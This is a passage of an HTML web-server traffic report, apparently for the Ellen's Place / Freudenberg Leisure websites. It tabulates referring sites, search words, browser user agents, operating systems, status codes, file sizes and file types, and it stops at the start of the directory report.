<tr><td class="R">120</td><td class="xl">https://ellens-place.com/</td></tr>
<tr><td class="R">118</td><td class="xl">https://fsalk.com/</td></tr>
<tr><td class="R">111</td><td class="xl">https://www.freudenbergleisure.lk/</td></tr>
<tr><td class="R">110</td><td class="xl">https://uptime.com/</td></tr>
<tr><td class="R">107</td><td class="xl">http://freudenbergleisure.com/</td></tr>
<tr><td class="R">107</td><td class="xl">https://www.ellens-place.com/</td></tr>
<tr><td class="R">106</td><td class="xl">http://fsaleisure.com/</td></tr>
<tr><td class="R">104</td><td class="xl">http://www.google.com/</td></tr>
<tr><td class="R">93</td><td class="xl">http://www.freudenbergleisure.lk/</td></tr>
<tr><td class="R">87</td><td class="xl">https://www.google.co.in/</td></tr>
<tr><td class="R">83</td><td class="xl">https://freudenbergleisure.lk/</td></tr>
<tr><td class="R">77</td><td class="xl">http://www.fsaleisure.com/</td></tr>
<tr><td class="R">60</td><td class="xl">https://www.google.co.uk/</td></tr>
<tr><td class="R">53</td><td class="xl">https://fsaleisure.com/</td></tr>
<tr><td class="R">1045</td><td class="xl">[not listed: 241 sites]</td></tr>
</tbody></table>
</div><div class="searchw"><h2><a name="searchw" id="searchw">Search Word Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Search Word Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./searchw.png" alt="" /></p>
<p class="whatinc">
Listing query words, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">search term</th></tr></thead>
<tbody><tr><td class="R">4</td><td class="xl">place</td></tr>
<tr><td class="R">3</td><td class="xl">ellen's</td></tr>
<tr><td class="R">1</td><td class="xl">colombo</td></tr>
<tr><td class="R">1</td><td class="xl">vebajara</td></tr>
</tbody></table>
</div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./browrep.png" alt="" /></p>
<p class="whatinc">
Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead>
<tbody><tr><td class="R">2439</td><td class="P">1054</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)</td></tr>
<tr><td class="R">1433</td><td class="P">986</td><td class="xl">Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)</td></tr>
<tr><td class="R">670</td><td class="P">670</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1</td></tr>
<tr><td class="R">4024</td><td class="P">655</td><td class="xl">Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)</td></tr>
<tr><td class="R">1578</td><td class="P">647</td><td class="xl">Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)</td></tr>
<tr><td class="R">1017</td><td class="P">562</td><td class="xl">Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)</td></tr>
<tr><td class="R">358</td><td class="P">352</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36</td></tr>
<tr><td class="R">385</td><td class="P">332</td><td class="xl">Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)</td></tr>
<tr><td class="R">341</td><td class="P">290</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon</td></tr>
<tr><td class="R">321</td><td class="P">284</td><td class="xl">ZoominfoBot (zoominfobot at zoominfo dot com)</td></tr>
<tr><td class="R">624</td><td class="P">277</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36</td></tr>
<tr><td class="R">269</td><td class="P">269</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36</td></tr>
<tr><td class="R">250</td><td class="P">250</td><td class="xl">Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)</td></tr>
<tr><td class="R">263</td><td class="P">218</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36</td></tr>
<tr><td class="R">209</td><td class="P">207</td><td class="xl">Ruby</td></tr>
<tr><td class="R">1086</td><td class="P">204</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36</td></tr>
<tr><td class="R">285</td><td class="P">199</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36</td></tr>
<tr><td class="R">189</td><td class="P">189</td><td class="xl">Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1</td></tr>
<tr><td class="R">176</td><td class="P">176</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0</td></tr>
<tr><td class="R">174</td><td class="P">174</td><td class="xl">Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online)</td></tr>
<tr><td class="R">836</td><td class="P">152</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</td></tr>
<tr><td class="R">150</td><td class="P">150</td><td class="xl">Apache-HttpClient/4.5.2 (Java/1.8.0_151)</td></tr>
<tr><td class="R">4946</td><td class="P">145</td><td class="xl">Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online) AppleWebKit/534.34</td></tr>
<tr><td class="R">122</td><td class="P">122</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)             Chrome/66.0.3359.181 Safari/537.36</td></tr>
<tr><td class="R">590</td><td class="P">116</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36</td></tr>
<tr><td class="R">112</td><td class="P">112</td><td class="xl">Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)</td></tr>
<tr><td class="R">111</td><td class="P">111</td><td class="xl">Magic Browser</td></tr>
<tr><td class="R">556</td><td class="P">95</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36</td></tr>
<tr><td class="R">95</td><td class="P">95</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr>
<tr><td class="R">363</td><td class="P">86</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36</td></tr>
<tr><td class="R">94</td><td class="P">79</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko</td></tr>
<tr><td class="R">77</td><td class="P">77</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36</td></tr>
<tr><td class="R">75</td><td class="P">75</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0</td></tr>
<tr><td class="R">76</td><td class="P">74</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0</td></tr>
<tr><td class="R">313</td><td class="P">69</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)</td></tr>
<tr><td class="R">67</td><td class="P">67</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36</td></tr>
<tr><td class="R">116</td><td class="P">67</td><td class="xl">Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)</td></tr>
<tr><td class="R">295</td><td class="P">65</td><td class="xl">Mozilla/5.0 (compatible; SemrushBot/3~bl; +http://www.semrush.com/bot.html)</td></tr>
<tr><td class="R">63</td><td class="P">63</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Safari/602.1</td></tr>
<tr><td class="R">63</td><td class="P">63</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0</td></tr>
<tr><td class="R">45404</td><td class="P">8932</td><td class="xl">[not listed: 2,150 browsers]</td></tr>
</tbody></table>
</div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./browsum.png" alt="" /></p>
<p class="whatinc">
Listing the top 20 browsers by the number of requests for pages, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead>
<tbody><tr><td class="N">1</td><td class="R">39272</td><td class="P">9395</td><td class="xl">Safari</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">30392</td><td class="P">8096</td><td class="xl">&nbsp;&nbsp;Safari/537</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1130</td><td class="P">475</td><td class="xl">&nbsp;&nbsp;Safari/602</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">4110</td><td class="P">392</td><td class="xl">&nbsp;&nbsp;Safari/604</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1866</td><td class="P">176</td><td class="xl">&nbsp;&nbsp;Safari/605</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">531</td><td class="P">75</td><td class="xl">&nbsp;&nbsp;Safari/600</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">229</td><td class="P">51</td><td class="xl">&nbsp;&nbsp;Safari/601</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">59</td><td class="P">34</td><td class="xl">&nbsp;&nbsp;Safari/534</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">337</td><td class="P">22</td><td class="xl">&nbsp;&nbsp;Safari/603</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">25</td><td class="P">22</td><td class="xl">&nbsp;&nbsp;Safari/533</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">332</td><td class="P">16</td><td class="xl">&nbsp;&nbsp;Safari/535</td></tr>
<tr><td class="N">2</td><td class="R">16855</td><td class="P">4283</td><td class="xl">Netscape (compatible)</td></tr>
<tr><td class="N">3</td><td class="R">7438</td><td class="P">2447</td><td class="xl">Firefox</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">719</td><td class="P">682</td><td class="xl">&nbsp;&nbsp;Firefox/40</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">431</td><td class="P">411</td><td class="xl">&nbsp;&nbsp;Firefox/42</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">249</td><td class="P">214</td><td class="xl">&nbsp;&nbsp;Firefox/3</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">196</td><td class="P">187</td><td class="xl">&nbsp;&nbsp;Firefox/56</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">156</td><td class="P">154</td><td class="xl">&nbsp;&nbsp;Firefox/45</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">99</td><td class="P">76</td><td class="xl">&nbsp;&nbsp;Firefox/47</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">750</td><td class="P">74</td><td class="xl">&nbsp;&nbsp;Firefox/59</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">55</td><td class="P">55</td><td class="xl">&nbsp;&nbsp;Firefox/48</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">670</td><td class="P">54</td><td class="xl">&nbsp;&nbsp;Firefox/64</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">303</td><td class="P">42</td><td class="xl">&nbsp;&nbsp;Firefox/65</td></tr>
<tr><td class="N">4</td><td class="R">1288</td><td class="P">576</td><td class="xl">MSIE</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">525</td><td class="P">331</td><td class="xl">&nbsp;&nbsp;MSIE/6</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">291</td><td class="P">71</td><td class="xl">&nbsp;&nbsp;MSIE/9</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">128</td><td class="P">65</td><td class="xl">&nbsp;&nbsp;MSIE/7</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">56</td><td class="P">56</td><td class="xl">&nbsp;&nbsp;MSIE/5</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">146</td><td class="P">34</td><td class="xl">&nbsp;&nbsp;MSIE/8</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">139</td><td class="P">16</td><td class="xl">&nbsp;&nbsp;MSIE/10</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">3</td><td class="P">3</td><td class="xl">&nbsp;&nbsp;MSIE/4</td></tr>
<tr><td class="N">5</td><td class="R">385</td><td class="P">332</td><td class="xl">Sogou web spider</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">385</td><td class="P">332</td><td class="xl">&nbsp;&nbsp;Sogou web spider/4</td></tr>
<tr><td class="N">6</td><td class="R">321</td><td class="P">284</td><td class="xl">ZoominfoBot (zoominfobot at zoominfo dot com)</td></tr>
<tr><td class="N">7</td><td class="R">2302</td><td class="P">250</td><td class="xl">Mozilla</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">8</td><td class="P">8</td><td class="xl">&nbsp;&nbsp;Mozilla/1</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">7</td><td class="P">6</td><td class="xl">&nbsp;&nbsp;Mozilla/0</td></tr>
<tr><td class="N">8</td><td class="R">209</td><td class="P">207</td><td class="xl">Ruby</td></tr>
<tr><td class="N">9</td><td class="R">181</td><td class="P">181</td><td class="xl">Apache-HttpClient</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">181</td><td class="P">181</td><td class="xl">&nbsp;&nbsp;Apache-HttpClient/4</td></tr>
<tr><td class="N">10</td><td class="R">273</td><td class="P">119</td><td class="xl">python-requests</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">273</td><td class="P">119</td><td class="xl">&nbsp;&nbsp;python-requests/2</td></tr>
<tr><td class="N">11</td><td class="R">111</td><td class="P">111</td><td class="xl">Magic Browser</td></tr>
<tr><td class="N">12</td><td class="R">219</td><td class="P">96</td><td class="xl">Opera</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">146</td><td class="P">37</td><td class="xl">&nbsp;&nbsp;Opera/9</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">30</td><td class="P">30</td><td class="xl">&nbsp;&nbsp;Opera/7</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">32</td><td class="P">26</td><td class="xl">&nbsp;&nbsp;Opera/8</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">3</td><td class="P">3</td><td class="xl">&nbsp;&nbsp;Opera/6</td></tr>
<tr><td class="N">13</td><td class="R">73</td><td class="P">71</td><td class="xl">Go-http-client</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">44</td><td class="P">44</td><td class="xl">&nbsp;&nbsp;Go-http-client/1</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">29</td><td class="P">27</td><td class="xl">&nbsp;&nbsp;Go-http-client/2</td></tr>
<tr><td class="N">14</td><td class="R">45</td><td class="P">45</td><td class="xl">OrgProbe</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">44</td><td class="P">44</td><td class="xl">&nbsp;&nbsp;OrgProbe/2</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;OrgProbe/0</td></tr>
<tr><td class="N">15</td><td class="R">40</td><td class="P">40</td><td class="xl">Netscape</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">23</td><td class="P">23</td><td class="xl">&nbsp;&nbsp;Netscape/4</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">13</td><td class="P">13</td><td class="xl">&nbsp;&nbsp;Netscape/5</td></tr>
<tr><td class="N">16</td><td class="R">262</td><td class="P">37</td><td class="xl">CCBot</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">262</td><td class="P">37</td><td class="xl">&nbsp;&nbsp;CCBot/2</td></tr>
<tr><td class="N">17</td><td class="R">55</td><td class="P">34</td><td class="xl">WhatsApp</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">54</td><td class="P">33</td><td class="xl">&nbsp;&nbsp;WhatsApp/2</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;WhatsApp/0</td></tr>
<tr><td class="N">18</td><td class="R">121</td><td class="P">34</td><td class="xl">facebookexternalhit</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">121</td><td class="P">34</td><td class="xl">&nbsp;&nbsp;facebookexternalhit/1</td></tr>
<tr><td class="N">19</td><td class="R">26</td><td class="P">26</td><td class="xl">curl</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">26</td><td class="P">26</td><td class="xl">&nbsp;&nbsp;curl/7</td></tr>
<tr><td class="N">20</td><td class="R">19</td><td class="P">19</td><td class="xl">Uptimebot.org - Free website monitoring</td></tr>
<tr><td class="N">&nbsp;</td><td class="R">1120</td><td class="P">223</td><td class="xl">[not listed: 84 browsers]</td></tr>
</tbody></table>
</div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./os.png" alt="" /></p>
<p class="whatinc">
Listing operating systems, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead>
<tbody><tr><td class="N">1</td><td class="R">25767</td><td class="P">7600</td><td class="xl">Windows</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">12276</td><td class="P">3628</td><td class="xl">&nbsp;&nbsp;Unknown Windows</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">12340</td><td class="P">3149</td><td class="xl">&nbsp;&nbsp;Windows NT</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">960</td><td class="P">663</td><td class="xl">&nbsp;&nbsp;Windows XP</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">58</td><td class="P">58</td><td class="xl">&nbsp;&nbsp;Windows Server 2003</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">82</td><td class="P">57</td><td class="xl">&nbsp;&nbsp;Windows 2000</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">20</td><td class="P">20</td><td class="xl">&nbsp;&nbsp;Windows 95</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">16</td><td class="P">16</td><td class="xl">&nbsp;&nbsp;Windows ME</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">11</td><td class="P">5</td><td class="xl">&nbsp;&nbsp;Windows 98</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">3</td><td class="P">3</td><td class="xl">&nbsp;&nbsp;Windows 3.1</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;Windows CE</td></tr>
<tr><td class="N">2</td><td class="R">17726</td><td class="P">4906</td><td class="xl">OS unknown</td></tr>
<tr><td class="N">3</td><td class="R">11397</td><td class="P">2839</td><td class="xl">Unix</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">11348</td><td class="P">2819</td><td class="xl">&nbsp;&nbsp;Linux</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">43</td><td class="P">15</td><td class="xl">&nbsp;&nbsp;Other Unix</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">6</td><td class="P">5</td><td class="xl">&nbsp;&nbsp;BSD</td></tr>
<tr><td class="N">4</td><td class="R">12667</td><td class="P">2299</td><td class="xl">Macintosh</td></tr>
<tr><td class="N">5</td><td class="R">3058</td><td class="P">1166</td><td class="xl">Known robots</td></tr>
</tbody></table>
</div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./code.png" alt="" /></p>
<p class="whatinc">
Listing status codes, sorted numerically.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead>
<tbody><tr><td class="R">67737</td><td class="xl">200 OK</td></tr>
<tr><td class="R">3</td><td class="xl">301 Document moved permanently</td></tr>
<tr><td class="R">32412</td><td class="xl">302 Document found elsewhere</td></tr>
<tr><td class="R">3442</td><td class="xl">304 Not modified since last retrieval</td></tr>
<tr><td class="R">1</td><td class="xl">500 Internal server error</td></tr>
</tbody></table>
</div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./size.png" alt="" /></p>
<table>
<thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead>
<tbody><tr><td class="x">          0</td><td class="R">3869</td><td class="b">&nbsp;</td></tr>
<tr><td class="x">   1B-  10B</td><td class="R">2</td><td class="b">&nbsp;</td></tr>
<tr><td class="x">  11B- 100B</td><td class="R">0</td><td class="b">&nbsp;</td></tr>
<tr><td class="x"> 101B-  1kB</td><td class="R">2872</td><td class="b"> 0.05%</td></tr>
<tr><td class="x">  1kB- 10kB</td><td class="R">10603</td><td class="b"> 1.58%</td></tr>
<tr><td class="x"> 10kB-100kB</td><td class="R">48359</td><td class="b">55.40%</td></tr>
<tr><td class="x">100kB-  1MB</td><td class="R">5474</td><td class="b">42.97%</td></tr>
</tbody></table>
</div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./type.png" alt="" /></p>
<p class="whatinc">
Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead>
<tbody><tr><td class="R">7638</td><td class="b">32.27%</td><td class="xl">.jpg  [JPEG graphics]</td></tr>
<tr><td class="R">14697</td><td class="b">22.22%</td><td class="xl">.js   [JavaScript code]</td></tr>
<tr><td class="R">18962</td><td class="b">20.23%</td><td class="xl">[directories]</td></tr>
<tr><td class="R">9978</td><td class="b"> 9.84%</td><td class="xl">[no extension]</td></tr>
<tr><td class="R">6196</td><td class="b"> 6.49%</td><td class="xl">.php  [PHP]</td></tr>
<tr><td class="R">7201</td><td class="b"> 4.40%</td><td class="xl">.css  [Cascading Style Sheets]</td></tr>
<tr><td class="R">5419</td><td class="b"> 4.18%</td><td class="xl">.png  [PNG graphics]</td></tr>
<tr><td class="R">632</td><td class="b"> 0.33%</td><td class="xl">.ico</td></tr>
<tr><td class="R">456</td><td class="b"> 0.03%</td><td class="xl">[not listed: 2 extensions]</td></tr>
</tbody></table>
</div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p>
<p><img src="./dir.png" alt="" /></p>
<p class="whatinc">
Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p>
<table>
